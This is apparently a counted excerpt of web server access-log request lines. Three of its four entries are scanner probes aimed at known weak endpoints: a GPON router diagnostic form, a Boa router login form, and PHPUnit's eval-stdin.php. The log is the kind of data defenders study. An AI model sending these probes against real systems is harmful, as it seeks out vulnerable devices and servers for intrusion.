1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 PRI * HTTP/2.0